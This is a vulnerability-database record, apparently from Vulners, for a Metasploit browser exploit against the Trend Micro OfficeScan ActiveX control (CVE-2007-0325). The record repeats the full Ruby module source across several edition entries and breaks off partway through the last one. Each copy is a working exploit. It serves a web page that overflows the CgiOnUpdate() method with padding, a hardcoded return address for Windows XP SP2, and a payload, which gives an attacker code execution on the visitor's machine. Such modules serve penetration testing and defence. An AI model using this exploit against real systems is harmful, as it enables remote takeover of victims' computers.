{"enchantments": {"vulnersScore": 7.5}, "id": "MSF:EXPLOIT/WINDOWS/BROWSER/TRENDMICRO_OFFICESCAN", "metasploitReliability": "Normal", "viewCount": 0, "bulletinFamily": "exploit", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "lastseen": "2018-02-26T21:07:38", "history": [{"bulletin": {"description": "This module exploits a stack buffer overflow in Trend Micro OfficeScan Corporate Edition 7.3. By sending an overly long string to the \"CgiOnUpdate()\" method located in the OfficeScanSetupINI.dll Control, an attacker may be able to execute arbitrary code.", "viewCount": 0, "id": "MSF:EXPLOIT/WINDOWS/BROWSER/TRENDMICRO_OFFICESCAN", "title": "Trend Micro OfficeScan Client ActiveX Control Buffer Overflow", "references": ["#", "http://www.securityfocus.com/bid/22585", "http://cvedetails.com/cve/cve-2007-0325"], "objectVersion": "1.4", "cvelist": ["CVE-2007-0325"], "bulletinFamily": "exploit", "published": "2007-08-31T11:58:31", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/trendmicro_officescan.rb", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "metasploitReliability": "Normal", "reporter": "Rapid7", "sourceData": "##\n# This module requires Metasploit: http://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Trend Micro OfficeScan Client ActiveX Control Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in Trend Micro OfficeScan\n Corporate Edition 7.3. By sending an overly long string to the\n \"CgiOnUpdate()\" method located in the OfficeScanSetupINI.dll Control,\n an attacker may be able to execute arbitrary code.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [ 'MC' ],\n 'References' =>\n [\n [ 'CVE', '2007-0325' ],\n [ 'OSVDB', '33040' ],\n [ 'BID', '22585' ],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Payload' =>\n {\n 'Space' => 800,\n 'BadChars' => \"\\x00\\x09\\x0a\\x0d'\\\\\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Windows XP SP2 Pro English', { 'Ret' => 0x7cc58fd8 } ],\n ],\n 'DisclosureDate' => 'Feb 12 2007',\n 'DefaultTarget' => 0))\n end\n\n def autofilter\n false\n end\n\n def check_dependencies\n use_zlib\n end\n\n def on_request_uri(cli, request)\n # Re-generate the payload\n return if ((p = regenerate_payload(cli)) == nil)\n\n # Randomize some things\n vname\t= rand_text_alpha(rand(100) + 1)\n strname\t= rand_text_alpha(rand(100) + 1)\n\n # Set the exploit buffer\n sploit = rand_text_alpha(2149) + [target.ret].pack('V') + p.encoded\n\n # Build out the message\n content = %Q|\n <html>\n <object classid='clsid:08d75bb0-d2b5-11d1-88fc-0080c859833b' id='#{vname}'></object>\n <script language='javascript'>\n var #{vname} = document.getElementById('#{vname}');\n var #{strname} = new String('#{sploit}');\n #{vname}.CgiOnUpdate = #{strname};\n </script>\n </html>\n |\n\n print_status(\"Sending #{self.name}\")\n\n # Transmit the response to the client\n send_response_html(cli, content)\n\n # Handle the payload\n handler(cli)\n end\n\nend\n", "lastseen": "2017-07-02T23:53:47", "history": [], "modified": "2017-05-03T20:42:21", "enchantments": {}, "href": "https://www.rapid7.com/db/modules/exploit/windows/browser/trendmicro_officescan", "type": "metasploit", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/trendmicro_officescan.rb"}, "differentElements": ["modified", "sourceData"], "edition": 1, "lastseen": "2017-07-02T23:53:47"}, {"bulletin": {"description": "This module exploits a stack buffer overflow in Trend Micro OfficeScan Corporate Edition 7.3. By sending an overly long string to the \"CgiOnUpdate()\" method located in the OfficeScanSetupINI.dll Control, an attacker may be able to execute arbitrary code.", "viewCount": 0, "id": "MSF:EXPLOIT/WINDOWS/BROWSER/TRENDMICRO_OFFICESCAN", "title": "Trend Micro OfficeScan Client ActiveX Control Buffer Overflow", "references": ["#", "http://www.securityfocus.com/bid/22585", "http://cvedetails.com/cve/cve-2007-0325"], "objectVersion": "1.4", "cvelist": ["CVE-2007-0325"], "bulletinFamily": "exploit", "published": "2007-08-31T11:58:31", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/trendmicro_officescan.rb", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "metasploitReliability": "Normal", "reporter": "Rapid7", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Trend Micro OfficeScan Client ActiveX Control Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in Trend Micro OfficeScan\n Corporate Edition 7.3. By sending an overly long string to the\n \"CgiOnUpdate()\" method located in the OfficeScanSetupINI.dll Control,\n an attacker may be able to execute arbitrary code.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [ 'MC' ],\n 'References' =>\n [\n [ 'CVE', '2007-0325' ],\n [ 'OSVDB', '33040' ],\n [ 'BID', '22585' ],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Payload' =>\n {\n 'Space' => 800,\n 'BadChars' => \"\\x00\\x09\\x0a\\x0d'\\\\\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Windows XP SP2 Pro English', { 'Ret' => 0x7cc58fd8 } ],\n ],\n 'DisclosureDate' => 'Feb 12 2007',\n 'DefaultTarget' => 0))\n end\n\n def autofilter\n false\n end\n\n def check_dependencies\n use_zlib\n end\n\n def on_request_uri(cli, request)\n # Re-generate the payload\n return if ((p = regenerate_payload(cli)) == nil)\n\n # Randomize some things\n vname\t= rand_text_alpha(rand(100) + 1)\n strname\t= rand_text_alpha(rand(100) + 1)\n\n # Set the exploit buffer\n sploit = rand_text_alpha(2149) + [target.ret].pack('V') + p.encoded\n\n # Build out the message\n content = %Q|\n <html>\n <object classid='clsid:08d75bb0-d2b5-11d1-88fc-0080c859833b' id='#{vname}'></object>\n <script language='javascript'>\n var #{vname} = document.getElementById('#{vname}');\n var #{strname} = new String('#{sploit}');\n #{vname}.CgiOnUpdate = #{strname};\n </script>\n </html>\n |\n\n print_status(\"Sending #{self.name}\")\n\n # Transmit the response to the client\n send_response_html(cli, content)\n\n # Handle the payload\n handler(cli)\n end\nend\n", "lastseen": "2017-07-24T19:26:38", "history": [], "modified": "2017-07-24T13:26:21", "enchantments": {}, "href": "https://www.rapid7.com/db/modules/exploit/windows/browser/trendmicro_officescan", "type": "metasploit", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/trendmicro_officescan.rb"}, "differentElements": ["href", "references"], "edition": 2, "lastseen": "2017-07-24T19:26:38"}, {"bulletin": {"description": "This module exploits a stack buffer overflow in Trend Micro OfficeScan Corporate Edition 7.3. By sending an overly long string to the \"CgiOnUpdate()\" method located in the OfficeScanSetupINI.dll Control, an attacker may be able to execute arbitrary code.", "viewCount": 0, "id": "MSF:EXPLOIT/WINDOWS/BROWSER/TRENDMICRO_OFFICESCAN", "title": "Trend Micro OfficeScan Client ActiveX Control Buffer Overflow", "references": [], "objectVersion": "1.4", "cvelist": ["CVE-2007-0325"], "bulletinFamily": "exploit", "published": "2007-08-31T11:58:31", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/trendmicro_officescan.rb", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "metasploitReliability": "Normal", "reporter": "Rapid7", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Trend Micro OfficeScan Client ActiveX Control Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in Trend Micro OfficeScan\n Corporate Edition 7.3. By sending an overly long string to the\n \"CgiOnUpdate()\" method located in the OfficeScanSetupINI.dll Control,\n an attacker may be able to execute arbitrary code.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [ 'MC' ],\n 'References' =>\n [\n [ 'CVE', '2007-0325' ],\n [ 'OSVDB', '33040' ],\n [ 'BID', '22585' ],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Payload' =>\n {\n 'Space' => 800,\n 'BadChars' => \"\\x00\\x09\\x0a\\x0d'\\\\\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Windows XP SP2 Pro English', { 'Ret' => 0x7cc58fd8 } ],\n ],\n 'DisclosureDate' => 'Feb 12 2007',\n 'DefaultTarget' => 0))\n end\n\n def autofilter\n false\n end\n\n def check_dependencies\n use_zlib\n end\n\n def on_request_uri(cli, request)\n # Re-generate the payload\n return if ((p = regenerate_payload(cli)) == nil)\n\n # Randomize some things\n vname\t= rand_text_alpha(rand(100) + 1)\n strname\t= rand_text_alpha(rand(100) + 1)\n\n # Set the exploit buffer\n sploit = rand_text_alpha(2149) + [target.ret].pack('V') + p.encoded\n\n # Build out the message\n content = %Q|\n <html>\n <object classid='clsid:08d75bb0-d2b5-11d1-88fc-0080c859833b' id='#{vname}'></object>\n <script language='javascript'>\n var #{vname} = document.getElementById('#{vname}');\n var #{strname} = new String('#{sploit}');\n #{vname}.CgiOnUpdate = #{strname};\n </script>\n </html>\n |\n\n print_status(\"Sending #{self.name}\")\n\n # Transmit the response to the client\n send_response_html(cli, content)\n\n # Handle the payload\n handler(cli)\n end\nend\n", "lastseen": "2017-08-21T15:31:38", "history": [], "modified": "2017-07-24T13:26:21", "enchantments": {}, "href": "", "type": "metasploit", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/trendmicro_officescan.rb"}, "differentElements": ["modified", "published"], "edition": 3, "lastseen": "2017-08-21T15:31:38"}, {"bulletin": {"description": "This module exploits a stack buffer overflow in Trend Micro OfficeScan Corporate Edition 7.3. By sending an overly long string to the \"CgiOnUpdate()\" method located in the OfficeScanSetupINI.dll Control, an attacker may be able to execute arbitrary code.", "viewCount": 0, "id": "MSF:EXPLOIT/WINDOWS/BROWSER/TRENDMICRO_OFFICESCAN", "title": "Trend Micro OfficeScan Client ActiveX Control Buffer Overflow", "references": [], "objectVersion": "1.4", "cvelist": ["CVE-2007-0325"], "bulletinFamily": "exploit", "published": "1976-01-01T00:00:00", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/trendmicro_officescan.rb", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "metasploitReliability": "Normal", "reporter": "Rapid7", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Trend Micro OfficeScan Client ActiveX Control Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in Trend Micro OfficeScan\n Corporate Edition 7.3. By sending an overly long string to the\n \"CgiOnUpdate()\" method located in the OfficeScanSetupINI.dll Control,\n an attacker may be able to execute arbitrary code.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [ 'MC' ],\n 'References' =>\n [\n [ 'CVE', '2007-0325' ],\n [ 'OSVDB', '33040' ],\n [ 'BID', '22585' ],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Payload' =>\n {\n 'Space' => 800,\n 'BadChars' => \"\\x00\\x09\\x0a\\x0d'\\\\\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Windows XP SP2 Pro English', { 'Ret' => 0x7cc58fd8 } ],\n ],\n 'DisclosureDate' => 'Feb 12 2007',\n 'DefaultTarget' => 0))\n end\n\n def autofilter\n false\n end\n\n def check_dependencies\n use_zlib\n end\n\n def on_request_uri(cli, request)\n # Re-generate the payload\n return if ((p = regenerate_payload(cli)) == nil)\n\n # Randomize some things\n vname\t= rand_text_alpha(rand(100) + 1)\n strname\t= rand_text_alpha(rand(100) + 1)\n\n # Set the exploit buffer\n sploit = rand_text_alpha(2149) + [target.ret].pack('V') + p.encoded\n\n # Build out the message\n content = %Q|\n <html>\n <object classid='clsid:08d75bb0-d2b5-11d1-88fc-0080c859833b' id='#{vname}'></object>\n <script language='javascript'>\n var #{vname} = document.getElementById('#{vname}');\n var #{strname} = new String('#{sploit}');\n #{vname}.CgiOnUpdate = #{strname};\n </script>\n </html>\n |\n\n print_status(\"Sending #{self.name}\")\n\n # Transmit the response to the client\n send_response_html(cli, content)\n\n # Handle the payload\n handler(cli)\n end\nend\n", "lastseen": "2017-10-19T21:39:23", "history": [], "modified": "1976-01-01T00:00:00", "enchantments": {}, "href": "", "type": "metasploit", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/trendmicro_officescan.rb"}, "differentElements": ["modified", "published"], "edition": 4, "lastseen": "2017-10-19T21:39:23"}, {"bulletin": {"description": "This module exploits a stack buffer overflow in Trend Micro OfficeScan Corporate Edition 7.3. By sending an overly long string to the \"CgiOnUpdate()\" method located in the OfficeScanSetupINI.dll Control, an attacker may be able to execute arbitrary code.", "viewCount": 0, "id": "MSF:EXPLOIT/WINDOWS/BROWSER/TRENDMICRO_OFFICESCAN", "title": "Trend Micro OfficeScan Client ActiveX Control Buffer Overflow", "references": [], "objectVersion": "1.4", "cvelist": ["CVE-2007-0325"], "bulletinFamily": "exploit", "published": "2007-08-31T11:58:31", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/trendmicro_officescan.rb", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "metasploitReliability": "Normal", "reporter": "Rapid7", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Trend Micro OfficeScan Client ActiveX Control Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in Trend Micro OfficeScan\n Corporate Edition 7.3. By sending an overly long string to the\n \"CgiOnUpdate()\" method located in the OfficeScanSetupINI.dll Control,\n an attacker may be able to execute arbitrary code.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [ 'MC' ],\n 'References' =>\n [\n [ 'CVE', '2007-0325' ],\n [ 'OSVDB', '33040' ],\n [ 'BID', '22585' ],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Payload' =>\n {\n 'Space' => 800,\n 'BadChars' => \"\\x00\\x09\\x0a\\x0d'\\\\\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Windows XP SP2 Pro English', { 'Ret' => 0x7cc58fd8 } ],\n ],\n 'DisclosureDate' => 'Feb 12 2007',\n 'DefaultTarget' => 0))\n end\n\n def autofilter\n false\n end\n\n def check_dependencies\n use_zlib\n end\n\n def on_request_uri(cli, request)\n # Re-generate the payload\n return if ((p = regenerate_payload(cli)) == nil)\n\n # Randomize some things\n vname\t= rand_text_alpha(rand(100) + 1)\n strname\t= rand_text_alpha(rand(100) + 1)\n\n # Set the exploit buffer\n sploit = rand_text_alpha(2149) + [target.ret].pack('V') + p.encoded\n\n # Build out the message\n content = %Q|\n <html>\n <object classid='clsid:08d75bb0-d2b5-11d1-88fc-0080c859833b' id='#{vname}'></object>\n <script language='javascript'>\n var #{vname} = document.getElementById('#{vname}');\n var #{strname} = new String('#{sploit}');\n #{vname}.CgiOnUpdate = #{strname};\n </script>\n </html>\n |\n\n print_status(\"Sending #{self.name}\")\n\n # Transmit the response to the client\n send_response_html(cli, content)\n\n # Handle the payload\n handler(cli)\n end\nend\n", "lastseen": "2017-10-19T23:42:53", "history": [], "modified": "2017-07-24T13:26:21", "enchantments": {}, "href": "", "type": "metasploit", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/trendmicro_officescan.rb"}, "differentElements": ["modified", "published"], "edition": 5, "lastseen": "2017-10-19T23:42:53"}, {"bulletin": {"description": "This module exploits a stack buffer overflow in Trend Micro OfficeScan Corporate Edition 7.3. By sending an overly long string to the \"CgiOnUpdate()\" method located in the OfficeScanSetupINI.dll Control, an attacker may be able to execute arbitrary code.", "viewCount": 0, "id": "MSF:EXPLOIT/WINDOWS/BROWSER/TRENDMICRO_OFFICESCAN", "title": "Trend Micro OfficeScan Client ActiveX Control Buffer Overflow", "references": [], "objectVersion": "1.4", "cvelist": ["CVE-2007-0325"], "bulletinFamily": "exploit", "published": "1976-01-01T00:00:00", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/trendmicro_officescan.rb", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "metasploitReliability": "Normal", "reporter": "Rapid7", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Trend Micro OfficeScan Client ActiveX Control Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in Trend Micro OfficeScan\n Corporate Edition 7.3. By sending an overly long string to the\n \"CgiOnUpdate()\" method located in the OfficeScanSetupINI.dll Control,\n an attacker may be able to execute arbitrary code.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [ 'MC' ],\n 'References' =>\n [\n [ 'CVE', '2007-0325' ],\n [ 'OSVDB', '33040' ],\n [ 'BID', '22585' ],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Payload' =>\n {\n 'Space' => 800,\n 'BadChars' => \"\\x00\\x09\\x0a\\x0d'\\\\\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Windows XP SP2 Pro English', { 'Ret' => 0x7cc58fd8 } ],\n ],\n 'DisclosureDate' => 'Feb 12 2007',\n 'DefaultTarget' => 0))\n end\n\n def autofilter\n false\n end\n\n def check_dependencies\n use_zlib\n end\n\n def on_request_uri(cli, request)\n # Re-generate the payload\n return if ((p = regenerate_payload(cli)) == nil)\n\n # Randomize some things\n vname\t= rand_text_alpha(rand(100) + 1)\n strname\t= rand_text_alpha(rand(100) + 1)\n\n # Set the exploit buffer\n sploit = rand_text_alpha(2149) + [target.ret].pack('V') + p.encoded\n\n # Build out the message\n content = %Q|\n <html>\n <object classid='clsid:08d75bb0-d2b5-11d1-88fc-0080c859833b' id='#{vname}'></object>\n <script language='javascript'>\n var #{vname} = document.getElementById('#{vname}');\n var #{strname} = new String('#{sploit}');\n #{vname}.CgiOnUpdate = #{strname};\n </script>\n </html>\n |\n\n print_status(\"Sending #{self.name}\")\n\n # Transmit the response to the client\n send_response_html(cli, content)\n\n # Handle the payload\n handler(cli)\n end\nend\n", "lastseen": "2017-10-24T04:36:13", "history": [], "modified": "1976-01-01T00:00:00", "enchantments": {}, "href": "", "type": "metasploit", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/trendmicro_officescan.rb"}, "differentElements": ["modified", "published"], "edition": 6, "lastseen": "2017-10-24T04:36:13"}, {"bulletin": {"description": "This module exploits a stack buffer overflow in Trend Micro OfficeScan Corporate Edition 7.3. By sending an overly long string to the \"CgiOnUpdate()\" method located in the OfficeScanSetupINI.dll Control, an attacker may be able to execute arbitrary code.", "viewCount": 0, "id": "MSF:EXPLOIT/WINDOWS/BROWSER/TRENDMICRO_OFFICESCAN", "title": "Trend Micro OfficeScan Client ActiveX Control Buffer Overflow", "references": [], "objectVersion": "1.4", "cvelist": ["CVE-2007-0325"], "bulletinFamily": "exploit", "published": "2007-08-31T11:58:31", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/trendmicro_officescan.rb", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "metasploitReliability": "Normal", "reporter": "Rapid7", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Trend Micro OfficeScan Client ActiveX Control Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in Trend Micro OfficeScan\n Corporate Edition 7.3. By sending an overly long string to the\n \"CgiOnUpdate()\" method located in the OfficeScanSetupINI.dll Control,\n an attacker may be able to execute arbitrary code.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [ 'MC' ],\n 'References' =>\n [\n [ 'CVE', '2007-0325' ],\n [ 'OSVDB', '33040' ],\n [ 'BID', '22585' ],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Payload' =>\n {\n 'Space' => 800,\n 'BadChars' => \"\\x00\\x09\\x0a\\x0d'\\\\\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Windows XP SP2 Pro English', { 'Ret' => 0x7cc58fd8 } ],\n ],\n 'DisclosureDate' => 'Feb 12 2007',\n 'DefaultTarget' => 0))\n end\n\n def autofilter\n false\n end\n\n def check_dependencies\n use_zlib\n end\n\n def on_request_uri(cli, request)\n # Re-generate the payload\n return if ((p = regenerate_payload(cli)) == nil)\n\n # Randomize some things\n vname\t= rand_text_alpha(rand(100) + 1)\n strname\t= rand_text_alpha(rand(100) + 1)\n\n # Set the exploit buffer\n sploit = rand_text_alpha(2149) + [target.ret].pack('V') + p.encoded\n\n # Build out the message\n content = %Q|\n <html>\n <object classid='clsid:08d75bb0-d2b5-11d1-88fc-0080c859833b' id='#{vname}'></object>\n <script language='javascript'>\n var #{vname} = document.getElementById('#{vname}');\n var #{strname} = new String('#{sploit}');\n #{vname}.CgiOnUpdate = #{strname};\n </script>\n </html>\n |\n\n print_status(\"Sending #{self.name}\")\n\n # Transmit the response to the client\n send_response_html(cli, content)\n\n # Handle the payload\n handler(cli)\n end\nend\n", "lastseen": "2017-10-24T07:40:48", "history": [], "modified": "2017-07-24T13:26:21", "enchantments": {}, "href": "", "type": "metasploit", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/trendmicro_officescan.rb"}, "differentElements": ["modified", "published"], "edition": 7, "lastseen": "2017-10-24T07:40:48"}, {"bulletin": {"description": "This module exploits a stack buffer overflow in Trend Micro OfficeScan Corporate Edition 7.3. By sending an overly long string to the \"CgiOnUpdate()\" method located in the OfficeScanSetupINI.dll Control, an attacker may be able to execute arbitrary code.", "viewCount": 0, "id": "MSF:EXPLOIT/WINDOWS/BROWSER/TRENDMICRO_OFFICESCAN", "title": "Trend Micro OfficeScan Client ActiveX Control Buffer Overflow", "references": [], "objectVersion": "1.4", "cvelist": ["CVE-2007-0325"], "bulletinFamily": "exploit", "published": "1976-01-01T00:00:00", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/trendmicro_officescan.rb", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "metasploitReliability": "Normal", "reporter": "Rapid7", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Trend Micro OfficeScan Client ActiveX Control Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in Trend Micro OfficeScan\n Corporate Edition 7.3. By sending an overly long string to the\n \"CgiOnUpdate()\" method located in the OfficeScanSetupINI.dll Control,\n an attacker may be able to execute arbitrary code.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [ 'MC' ],\n 'References' =>\n [\n [ 'CVE', '2007-0325' ],\n [ 'OSVDB', '33040' ],\n [ 'BID', '22585' ],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Payload' =>\n {\n 'Space' => 800,\n 'BadChars' => \"\\x00\\x09\\x0a\\x0d'\\\\\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Windows XP SP2 Pro English', { 'Ret' => 0x7cc58fd8 } ],\n ],\n 'DisclosureDate' => 'Feb 12 2007',\n 'DefaultTarget' => 0))\n end\n\n def autofilter\n false\n end\n\n def check_dependencies\n use_zlib\n end\n\n def on_request_uri(cli, request)\n # Re-generate the payload\n return if ((p = regenerate_payload(cli)) == nil)\n\n # Randomize some things\n vname\t= rand_text_alpha(rand(100) + 1)\n strname\t= rand_text_alpha(rand(100) + 1)\n\n # Set the exploit buffer\n sploit = rand_text_alpha(2149) + [target.ret].pack('V') + p.encoded\n\n # Build out the message\n content = %Q|\n <html>\n <object classid='clsid:08d75bb0-d2b5-11d1-88fc-0080c859833b' id='#{vname}'></object>\n <script language='javascript'>\n var #{vname} = document.getElementById('#{vname}');\n var #{strname} = new String('#{sploit}');\n #{vname}.CgiOnUpdate = #{strname};\n </script>\n </html>\n |\n\n print_status(\"Sending #{self.name}\")\n\n # Transmit the response to the client\n send_response_html(cli, content)\n\n # Handle the payload\n handler(cli)\n end\nend\n", "lastseen": "2017-10-30T21:38:41", "history": [], "modified": "1976-01-01T00:00:00", "enchantments": {}, "href": "", "type": "metasploit", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/trendmicro_officescan.rb"}, "differentElements": ["modified", "published"], "edition": 8, "lastseen": "2017-10-30T21:38:41"}, {"bulletin": {"description": "This module exploits a stack buffer overflow in Trend Micro OfficeScan Corporate Edition 7.3. By sending an overly long string to the \"CgiOnUpdate()\" method located in the OfficeScanSetupINI.dll Control, an attacker may be able to execute arbitrary code.", "viewCount": 0, "id": "MSF:EXPLOIT/WINDOWS/BROWSER/TRENDMICRO_OFFICESCAN", "title": "Trend Micro OfficeScan Client ActiveX Control Buffer Overflow", "references": [], "objectVersion": "1.4", "cvelist": ["CVE-2007-0325"], "bulletinFamily": "exploit", "published": "2007-08-31T11:58:31", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/trendmicro_officescan.rb", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "metasploitReliability": "Normal", "reporter": "Rapid7", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Trend Micro OfficeScan Client ActiveX Control Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in Trend Micro OfficeScan\n Corporate Edition 7.3. By sending an overly long string to the\n \"CgiOnUpdate()\" method located in the OfficeScanSetupINI.dll Control,\n an attacker may be able to execute arbitrary code.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [ 'MC' ],\n 'References' =>\n [\n [ 'CVE', '2007-0325' ],\n [ 'OSVDB', '33040' ],\n [ 'BID', '22585' ],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Payload' =>\n {\n 'Space' => 800,\n 'BadChars' => \"\\x00\\x09\\x0a\\x0d'\\\\\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Windows XP SP2 Pro English', { 'Ret' => 0x7cc58fd8 } ],\n ],\n 'DisclosureDate' => 'Feb 12 2007',\n 'DefaultTarget' => 0))\n end\n\n def autofilter\n false\n end\n\n def check_dependencies\n use_zlib\n end\n\n def on_request_uri(cli, request)\n # Re-generate the payload\n return if ((p = regenerate_payload(cli)) == nil)\n\n # Randomize some things\n vname\t= 